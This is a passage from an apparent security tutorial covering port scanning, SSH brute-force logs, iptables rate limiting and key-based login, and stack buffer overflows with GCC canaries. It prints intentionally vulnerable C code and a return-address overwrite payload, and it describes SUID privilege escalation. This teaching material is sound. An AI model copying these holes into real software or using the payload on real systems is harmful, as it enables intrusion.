But, as I said, the greatest disadvantage of this technique is the time the scan takes. Open or Filtered ports rarely respond, which can lead to several retransmissions (because the scanner assumes the packet could have been lost). Closed ports are an even bigger problem, because they normally respond with ICMP Unreachable errors and many operating systems limit the rate at which ICMP packets are sent; Linux, for example, normally limits them to one packet per second. Under such constraints, scanning the full range of ports of a machine (65536 ports, at one response per second, is 65536 seconds) would take more than 18 hours. One optimization is to scan only the most common ports.

There are many other techniques used in Port Scanning (more information: here), but these ones show how this type of scan behaves. It is easy to see why it is a critical step in an attacker's methodology. To identify the target correctly, a single technique may not be enough, so Port Scanning is not just about TCP SYN scans.

The tool I recommend for Port Scanning is Nmap, because it supports all the techniques I mentioned, and many more. It is actively developed, and its author, Gordon "Fyodor" Lyon, is a guru in this area and is largely responsible for its constant development. For more information about Port Scanning, see the Nmap page explaining Port Scanning Techniques.

## Gain access to the machine

At this point the attacker already has a huge list of reachable machines and services.
To get remote access to a machine there are, in essence, two techniques. The first is brute force with password dictionaries (see the Infinite monkey theorem). It may seem silly, but it is still heavily used against services such as SSH, as you can see in your /var/log/auth.log file:

```
Dec 24 01:24:46 kubos sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:24:48 kubos sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 kubos sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:01 kubos sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:04 kubos sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 kubos sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:21 kubos sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:22 kubos sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 kubos sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
```
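Counting failed logins per source address is a quick way to see who is hammering the SSH port. A minimal C sketch that extracts the source address from one `Failed password` line; `failed_login_source` is a hypothetical helper, and it assumes the message layout shown in the auth.log excerpt (the address follows the last " from " in the line, which also copes with usernames that contain that word).

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* If `line` is an sshd "Failed password ... from <ip> port <n>" entry, copies
 * <ip> into `ip` (NUL-terminated, at most ip_size - 1 chars) and returns true. */
bool failed_login_source(const char *line, char *ip, size_t ip_size)
{
    const char *fp = strstr(line, "Failed password for ");
    if (fp == NULL || ip_size == 0)
        return false;

    /* Find the last " from " after the "Failed password" marker. */
    const char *from = NULL;
    for (const char *p = strstr(fp, " from "); p != NULL; p = strstr(p + 1, " from "))
        from = p;
    if (from == NULL)
        return false;

    from += strlen(" from ");
    size_t len = strcspn(from, " ");   /* the address ends at the next space */
    if (len == 0 || len >= ip_size)
        return false;
    memcpy(ip, from, len);
    ip[len] = '\0';
    return true;
}
```

Feeding every line of auth.log through this function and keeping a counter per address gives a rough ranking of the most persistent sources.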
These log lines are just a few of the hundreds of attempts recorded. Here are some strategies to protect against these attacks.

### Use strong passwords

This section may seem ridiculous, but the fact that this type of attack is still used shows a lack of culture in choosing passwords. Here are some requirements for a strong password nowadays:

• A password should have a minimum of 8 characters
• If the password can be found in a dictionary, it is trivial and not good. Attackers have large dictionaries of words in different languages (from the IP address, for example, they can choose which dictionary to use)
• Trivial variations of trivial passwords, such as "p4ssword", are almost as bad as "password" against a dictionary attack, but substantially better against a brute-force attack
• The password should ideally combine symbols, numbers, uppercase and lowercase letters
• Mnemonics are easy to remember (even with special symbols) and make the best kind of passwords, for example "Whiskey-Cola is EUR 3 in Academic Bar!" = "W-CiE3iAB!" (this password is rated Very Strong by The Password Meter)

The fact is, strong passwords can prevent an attempt from succeeding, but they do not prevent the numerous attempts that are made constantly. In an extreme situation the machine might even suffer a Denial of Service, which must be avoided on a machine whose purpose is to offer a service to the outside. That is why it is also worth limiting the connections to port 22 (SSH) with iptables.

### Using iptables to mitigate the attacks

We can limit access to a single source:

```
iptables -A INPUT -m state --state NEW -p tcp -m tcp -s 192.168.1.100 --dport 22 -j ACCEPT
```

The -s flag indicates the source host IP. Note that an ACCEPT rule like this only restricts access if other SSH connections are dropped afterwards, by a later DROP rule or by a DROP default policy on the chain.
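Conceptually, a source match like `-s` compares the packet's source address with the rule's address under a network mask, and a plain host address behaves like a /32 network. A minimal C sketch of that comparison, not iptables' actual code; `ipv4_in_cidr` and `ipv4` are hypothetical helpers working on host-byte-order addresses.

```c
#include <stdbool.h>
#include <stdint.h>

/* True if `addr` is inside `net`/`prefix_len`, i.e. the first prefix_len
 * bits are equal. prefix_len must be 0..32; 32 means a single host. */
bool ipv4_in_cidr(uint32_t addr, uint32_t net, unsigned prefix_len)
{
    /* Shifting a 32-bit value by 32 is undefined in C, so /0 is special-cased. */
    uint32_t mask = prefix_len == 0 ? 0 : (uint32_t)(UINT32_MAX << (32 - prefix_len));
    return (addr & mask) == (net & mask);
}

/* Builds a host-order address from its four dotted-quad parts. */
uint32_t ipv4(unsigned a, unsigned b, unsigned c, unsigned d)
{
    return (uint32_t)a << 24 | (uint32_t)b << 16 | (uint32_t)c << 8 | (uint32_t)d;
}
```

For instance, `ipv4_in_cidr(ipv4(192,168,1,42), ipv4(192,168,1,0), 24)` is true, while the same address against `ipv4(192,168,1,100)` with prefix 32 is false.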
We can also restrict access to a subnet or an address class with the same flag:

    iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

If we want to reach our machine from anywhere, we might instead limit the server to accepting, for example, 2 connections per minute:

    iptables -N SSH_CONNECTION
    iptables -A INPUT -m state --state NEW -p tcp --dport 22 -j SSH_CONNECTION
    iptables -A SSH_CONNECTION -m recent --set --name SSH
    iptables -A SSH_CONNECTION -m recent --update --seconds 60 --hitcount 3 --name SSH -j DROP

Here we create a new chain called SSH_CONNECTION and send every new connection to port 22 through it. The chain uses the recent module to record each source IP and drops a new connection whenever it would be the third (or later) from the same IP within 60 seconds, so at most two connection attempts per minute per IP get through.

## RSA authentication

To avoid passwords altogether, we can authenticate with a pair of RSA keys, which completely sidesteps brute-force and dictionary attacks. The steps are:

• Generate the key pair with the command ssh-keygen -t rsa. This creates the files ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
• On each machine we want to connect to (target), append the contents of id_rsa.pub to ~/.ssh/authorized_keys, for example with: cat id_rsa.pub >> ~/.ssh/authorized_keys
• On each machine we want to connect from (home), put id_rsa in ~/.ssh/.
• Finally, disable password-based login by adding the line "PasswordAuthentication no" to /etc/ssh/sshd_config and then restarting the sshd daemon with: /etc/init.d/sshd restart

## Exploitation of vulnerabilities

Now that we have reduced the chances of a successful password attack, let's look at another way attackers gain access to a system. An exploit is a piece of code that takes advantage of a flaw in an application to cause behavior its developers did not anticipate. Common goals are, for example, gaining control of a machine or escalating privileges.

A widely used type of exploit is stack smashing, which occurs when a program writes to memory outside the space allocated for a data structure on the stack, usually a fixed-size buffer. Take a very simple local example of this exploit:

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[10];

        if (argc < 2)
            return 1;
        /* Deliberately unsafe: no bounds check, so a long argument overflows buffer */
        strcpy(buffer, argv[1]);
        printf("%s", buffer);
        return 0;
    }

When we compile the above code and run it with a long argument, we get:

    user@honeypot:~$ gcc exploit.c -o exploit
    user@honeypot:~$ ./exploit thisisanexploit
    *** stack smashing detected ***: ./exploit terminated
    thisisanexploitAborted

As we can see, GCC inserted a check that detected the overflow and aborted the program before the corrupted stack could be used. But this example is as simple as it gets; more sophisticated attacks can get around these mechanisms.

### The stack

When a function is called, the address to return to must be saved somewhere, and that place is the stack. Saving return addresses on the stack has advantages. Each task has its own stack, so each keeps its own return addresses. Recursion is also fully supported: when a function calls itself, a new return address is saved for every recursive call, each in its own stack frame.
For example, consider the following Java code:

    /** lengthOf returns the length of list l */
    public int lengthOf(Cell l) {
        int length;

        if (l == null) {
            length = 0;
        }
        else {
            length = 1 + lengthOf(l.getNext());
        }
        return length;
    }
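For readers more used to C, the language of the other examples in this post, here is a sketch of the same recursion. The struct cell type is a hypothetical stand-in for the Java Cell class. Each call to length_of gets its own stack frame, which holds its own length variable and the address to return to in the caller.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical C counterpart of the Java Cell class: a singly linked list node. */
struct cell {
    int value;
    struct cell *next;
};

/* Same logic as lengthOf: every call pushes a new frame with its own
 * `length` variable and its own saved return address. */
int length_of(const struct cell *l)
{
    int length;

    if (l == NULL)
        length = 0;
    else
        length = 1 + length_of(l->next);   /* deeper frame is pushed here */
    return length;
}
```

For a three-cell list, four frames are live at the deepest point (three for the cells and one for the final NULL), and they are popped one by one as each call returns.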

Each recursive call pushes a new frame with its own return address and its own length variable, producing the following stacks:

The stack also holds local data: if a function declares local variables, they are stored there too. It may also hold the parameters passed to the function.

### GCC and stack canaries

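If you are wondering why it is called a canary: the name comes from the canaries miners once carried into coal mines as an early warning of danger.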
GCC and other compilers insert a known value, the canary, into the stack to detect buffer overflows. The canary sits between a function's local buffers and its saved return address, so when a stack buffer overflows, the canary is the first field to be corrupted. Before the function returns, code inserted by GCC checks the canary and, if it has changed, prints the message "*** stack smashing detected ***" and aborts the program.
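The idea can be modelled without any undefined behaviour by laying out a toy "frame" in a plain byte array: a 10-byte buffer, then a 4-byte canary, then a 4-byte slot standing in for the return address. The sizes, the canary value and the function name copy_and_check_canary are assumptions for illustration only; the real GCC protection (enabled with -fstack-protector) uses a random guard value and calls __stack_chk_fail when the check fails.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy model of one stack frame laid out in a plain byte array
 * (sizes are illustrative assumptions):
 *   [0..10)  char buffer[10]
 *   [10..14) canary
 *   [14..18) slot standing in for the saved return address      */
enum { BUF_SIZE = 10, CANARY_SIZE = 4, RET_SIZE = 4,
       FRAME_SIZE = BUF_SIZE + CANARY_SIZE + RET_SIZE };

static const unsigned char CANARY[CANARY_SIZE] = { 0xDE, 0xAD, 0xBE, 0xEF };

/* Copies `input` (with its terminating NUL) into the toy buffer the way
 * an unchecked strcpy would, but stops at the end of the array so the
 * model itself stays well-defined. Returns 1 if the canary survived,
 * 0 if a real check would report "stack smashing detected". */
int copy_and_check_canary(const char *input)
{
    unsigned char frame[FRAME_SIZE] = { 0 };
    size_t n;

    assert(input != NULL);
    memcpy(frame + BUF_SIZE, CANARY, CANARY_SIZE);   /* "prologue" plants canary */

    n = strlen(input) + 1;                           /* strcpy also copies the NUL */
    if (n > FRAME_SIZE)
        n = FRAME_SIZE;
    memcpy(frame, input, n);                         /* no check against BUF_SIZE */

    /* "Epilogue": compare the canary with its original value. */
    return memcmp(frame + BUF_SIZE, CANARY, CANARY_SIZE) == 0;
}
```

With the input from the earlier run, thisisanexploit (15 characters plus the NUL), the copy reaches bytes 10 to 13 and the function reports a corrupted canary, while a short input such as hello leaves it intact.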

### Stack corruption

If you are still wondering what a stack buffer overflow is good for, here is a simple example (from the Wikipedia article).
Imagine you have the following code:

    #include <string.h>

    void foo(char *bar)
    {
        char c[12];

        memcpy(c, bar, strlen(bar));  // no bounds checking...
    }

    int main(int argc, char **argv)
    {
        foo(argv[1]);
    }

As you can see, foo does not validate its input: nothing checks that the string bar points to fits in c.
This is the stack that is created when foo is called by another function:

When you call foo like this:

    void function() {
        char *newBar = (char *)malloc(sizeof(char)*6);
        strcpy(newBar,"hello");
        foo(newBar);
    }


This is what happens to the stack:

Now, if you try this:

    void function() {
        char *newBar = (char *)malloc(sizeof(char)*25);  /* 24 payload bytes + NUL */
        strcpy(newBar,"AAAAAAAAAAAAAAAAAAAA\x08\x35\xC0\x80");
        foo(newBar);
    }


This is what happens to the stack:

So, when foo returns, it pops the overwritten return address and jumps to it (0x80C03508 in this case, because x86 is little-endian and reads the bytes \x08\x35\xC0\x80 starting from the least significant one) instead of the expected address. In the image, that address is the beginning of the char c[12] buffer, where the attacker could previously have placed shellcode instead of the AAAAA string…
Now imagine that this program is owned by root and has the SUID bit set: the shellcode would run as root, so the attacker instantly escalates to root…

Fortunately, this kind of attack has become less common since the introduction of stack canaries. This protection is possible because the layout of a stack frame is fixed when the function is compiled, so the compiler knows where to place the canary; the heap, as we will see later (in part II), is dynamic.
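Canaries only detect an overflow after it has happened; the underlying fix is for foo to check the length of its input before copying. A minimal sketch of such a variant follows (foo_checked and its return convention are hypothetical).

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical bounds-checked variant of foo(): refuse any input that
 * does not fit in c[] (including the terminating NUL) instead of
 * copying it blindly. Returns 0 on success, -1 if the input is too long. */
int foo_checked(const char *bar)
{
    char c[12];
    size_t len;

    assert(bar != NULL);
    len = strlen(bar);
    if (len >= sizeof c)            /* would overflow c: reject */
        return -1;

    memcpy(c, bar, len + 1);        /* safe: len + 1 <= sizeof c */
    printf("copied: %s\n", c);
    return 0;
}
```

With this check, the 24-byte payload above is rejected before anything is written to the stack, so the return address is never touched.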